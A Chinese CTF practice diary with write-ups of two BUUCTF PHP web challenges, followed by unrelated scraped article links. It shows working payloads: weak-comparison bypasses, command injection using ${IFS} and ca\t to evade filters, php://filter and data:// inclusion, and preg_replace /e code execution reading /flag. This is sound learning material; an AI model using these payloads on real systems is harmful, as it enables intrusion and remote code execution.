【BUU刷题日记】——第二周

一、[WUSTCTF2020]朴实无华 1

  • 目录爆破

    使用dirsearch扫描发现没有结果,因为如果dirsearch请求过快则会导致超出服务器最大请求,扫描不出本来可以访问的目录,所以需要调小线程数:

    python dirsearch.py -u http://d8149651-49cb-4573-a1f7-1fbc8b1ab946.node4.buuoj.cn:81/ -t 30

  • 访问

    抓包一下:

    直接访问,会出现一堆中文乱码,使用火狐修复一下变成下图:

    <img src="/img.jpg">
    
<?php
    
header('Content-type:text/html;charset=utf-8');
    
error_reporting(0);
    
highlight_file(__file__);

//level 1
    
if (isset($_GET['num'])){
    
    $num = $_GET['num'];
    
    if(intval($num) < 2020 && intval($num + 1) > 2021){
    
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    
    }else{
    
        die("金钱解决不了穷人的本质问题");
    
    }
    
}else{
    
    die("去非洲吧");
    
}
    
//level 2
    
if (isset($_GET['md5'])){
    
   $md5=$_GET['md5'];
    
   if ($md5==md5($md5))
    
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    
   else
    
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
    
}else{
    
    die("去非洲吧");
    
}

//get flag
    
if (isset($_GET['get_flag'])){
    
    $get_flag = $_GET['get_flag'];
    
    if(!strstr($get_flag," ")){
    
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
    
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
    
        system($get_flag);
    
    }else{
    
        die("快到非洲了");
    
    }
    
}else{
    
    die("去非洲吧");
    
}
    
?>

    观察源码可以发现,要想得到flag需要进行三次绕过。

  • 第一关

    需要满足:

    intval($num) < 2020 && intval($num + 1) > 2021

    可以使用科学计数法,使num=2e4,intval函数的处理num会认为num为字符串,从第一个数字开始转换,直到遇到非数字。但是num+1运算时会将num作为科学计数法。

    $num=2e4
    
intval($num)=2
    
intval($num+1)=20001

  • 第二关

    需要满足:

    $md5==md5($md5)

    只需要$md字符串开头为0e,并且md5($md5)后开头也为0e,这样php中弱等于就会将其作为科学计数法,0==0。

    $md5=0e215962017

  • 第三关

    两个条件:

    !strstr($get_flag," ")
    
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);

    需要$get_flag中不包含空格,不包含cat。

    对于空格的规避可以使用:${IFS}、$IFS$1

    对于cat的规避可以使用:ca\t、tac、more

总结

  • 目录爆破在有些情况下需要调小线程才能爆破成功
  • php intval函数的漏洞
  • php 在md5函数情况下的等号漏洞
  • linux规避空格、关键词过滤

二、[BJDCTF2020]ZJCTF,不过如此

  • 代码:

    <?php

error_reporting(0);
    
$text = $_GET["text"];
    
$file = $_GET["file"];
    
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    
    if(preg_match("/flag/",$file)){
    
        die("Not now!");
    
    }

    include($file);  //next.php

}
    
else{
    
    highlight_file(__FILE__);
    
}
    
?>

    file_get_contents:把文件中的内容读入字符串。

  • 利用

    对于文件读取的协议可以使用data伪协议,它是一个数据流封装协议,从php5.2.0开始生效

    构造payload:

    ?text=data://text/plain,I have a dream
    
或者
    
?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=

    下面的变量file提示查看next.php,文件包含使用php伪协议,payload如下:

    ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/convert.base64-encode/resource=next.php

    得到的base64字符串解密后:

    <?php
    
$id = $_GET['id'];
    
$_SESSION['id'] = $id;

function complex($re, $str) {
    
    return preg_replace(
    
        '/(' . $re . ')/ei',
    
        'strtolower("\\1")',
    
        $str
    
    );
    
}

foreach($_GET as $re => $str) {
    
    echo complex($re, $str). "\n";
    
}

function getFlag(){
    
	@eval($_GET['cmd']);
    
}

    • preg_replace函数:

      preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed

      其中,$pattern 参数是一个用于匹配的正则表达式,$replacement 参数是替换的字符串,$subject 参数是需要进行替换的原字符串。$limit 参数表示最多替换的次数(默认为 -1,表示不限制替换次数),$count 参数是一个用于存储实际替换次数的变量(可选)。

      上面的代码就是通过变量$re中的模式匹配,将$str中匹配到的字符串转化为小写。

    • /e漏洞:

      在preg_replace的/e模式下,会将替换字符串当做php代码来执行,这样就可以调用getFlag()函数进行命令行操作。

      $str = '1 2 3 4 5';
      
$result = preg_replace('/\d+/e', 'pow($0, 2)', $str);
      
echo $result; // 输出 1 4 9 16 25

      这段代码就是将$str中的变量全部平方。$0代表匹配到的字符串,也就是数字本身。

      在本题中,替换字符串部分为'strtolower("\\1")',其中\1等价于$1,代表匹配到的第一个字符串。整个含义就是将匹配到的第一个字符串全变成小写。

    • foreach:

      表示把$GET数组中键值赋值给$re,单元值赋值给$str。

    • payload:

      因为模式串中为$re的值所以GET传入的变量名应该为?.*,因为.用于匹配除了\n的其他任意字符。但是使用GET传入变量时.会被过滤成_,因此换用其他表达式/S*。

      同时其值应该为${getFlag()}用于执行getFlag函数,cmd的值为system('cat /flag')。

      ?\S*=${getFlag()}&cmd=system('cat /flag');
      
//分号不能丢

      其实不太明白为什么要加*号,网上对${}里面的函数调用也描述很少,先记下来。

总结

  • data伪协议输入文件流
  • preg_match在/e模式下的漏洞

【BUU刷题日记】--第二周的更多相关文章

  1. Buu刷题

    前言 希望自己能够更加的努力,希望通过多刷大赛题来提高自己的知识面.(ง •_•)ง easy_tornado 进入题目 看到render就感觉可能是模板注入的东西 hints.txt给出提示,可以看 ...

  2. Leetcode | 刷题日记(1)

    本文记录个人刷题记录 推荐两个刷题网站: 地址:https://leetcode.com/ 另外一个地址:http://www.lintcode.com/ 1.Write a SQL query to ...

  3. BUU刷题01

    [安洵杯 2019]easy_serialize_php 直接给了源代码 <?php $function = @$_GET['f']; function filter($img){ $filte ...

  4. python刷题第三周

    以下是本周有所收获的题目 第一题: 第4章-4 验证"哥德巴赫猜想" (20 分) 数学领域著名的"哥德巴赫猜想"的大致意思是:任何一个大于2的偶数总能表示为两 ...

  5. lightoj刷题日记

    提高自己的实力, 也为了证明, 开始板刷lightoj,每天题量>=1: 题目的类型会在这边说明,具体见分页博客: SUM=54; 1000 Greetings from LightOJ [简单 ...

  6. BUU刷题记录

    [GWCTF 2019]mypassword xss+csp 打开页面可以注册登录 登进去提示不是sql注入 然后提示源码 看一下 然后有段后端代码写道了注释里 <!-- if(is_array ...

  7. 刷题日记-JZ25合并有序链表

    合并有序链表 递归方式合并链表pHead1,pHead2 base case是 pHead1为空或者pHead2为空 递归方式是 如果pHead1->val < pHead2->va ...

  8. mysql刷题笔记

    近期,为提升自己的工程能力,在休息时常通过刷题来回顾一下基础性知识. 于是选择了牛客网上的mysql知识题库练手,过程中,主要遇到了几个比较有意思的题,记录下来,方便回顾. 题1:SQL29 计算用户 ...

  9. 牛客SQL刷题第一趴——非技术入门基础篇

    user_profile表: id device_id gender age university province 1 2138 male 21 北京大学 Beijing 2 3214 male   ...

  10. python刷题第二周

    1: 第3章-5 字符转换 (15 分) 本题要求提取一个字符串中的所有数字字符('0'--'9'),将其转换为一个整数输出. 输入格式: 输入在一行中给出一个不超过80个字符且以回车结束的字符串. ...

随机推荐

  1. 微信小程序 WXSS模板样式,全局和页面配置,网络请求

    [黑马程序员前端微信小程序开发教程,微信小程序从基础到发布全流程_企业级商城实战(含uni-app项目多端部署)] https://www.bilibili.com/video/BV1834y1676 ...

  2. Flutter ListView 不满屏 无法滚动

    场景: flutter ListView 在做上拉加载的时候,未list添加controller后,数据不满屏,无法滚动 解决: 未listview 设置: physics: const Always ...

  3. 音视频开发进阶——YUV与RGB的采样与存储格式

    在上一篇文章中,我们带大家了解了视频.图像.像素和色彩之间的关系,还初步认识了两种常用的色彩空间,分别是大家比较熟悉的 RGB,以及更受视频领域青睐的 YUV.今天,我们将继续深入学习 RGB.YUV ...

  4. eclipse在主题商城下载安装黑色主题

    Eclipse配置黑色主题方法: 1. 借用国外一个Elipse主题网站分享的主题配置文件来配置一个黑色的主题. 主题网址 2. 在这个网站下载自己喜欢的主题,单击主题进入下载页面,建议大家选择EPF ...

  5. 【技术积累】JavaScript中的基础语法【二】

    JavaScript编写方式 JavaScript是一种脚本语言,用于为网页添加交互性和动态功能.它可以直接嵌入到HTML中,并通过浏览器解释执行.下面是一些常见的JavaScript编写方式和相应的 ...

  6. Python数据分析易错知识点归纳(六):机器学习

    六.机器学习 分类和聚类的区别 分类是有监督学习,聚类是无监督学习 分类算法用于预测新样本,聚类用于理解已知数据 标准化/归一化 type_se_num = type_se[type_se!= 'ob ...

  7. 2021-7-7 Vue的for使用实例

    <!DOCTYPE html> <html> <head> <title> </title> </head> <body& ...

  8. Centos安装 Apache Benchmark

    检查依赖包是否安装 1 rpm -qa|grep apr-util 2 3 rpm -qa|grep yum-utils 输出信息: 1 apr-util-1.5.2-6.el7.x86_64 2 y ...

  9. PHP插件

  10. 加密解决HTTP协议带来的安全问题

    HTTP协议默认是采取明文传输的,容易被中间人窃听.拦截.篡改,存在安全隐患. 常见提高安全性的方法是对通信内容进行加密,再进行传输,常见的加密方式有 不可逆加密:单向散列函数 可逆加密:对称加密.非 ...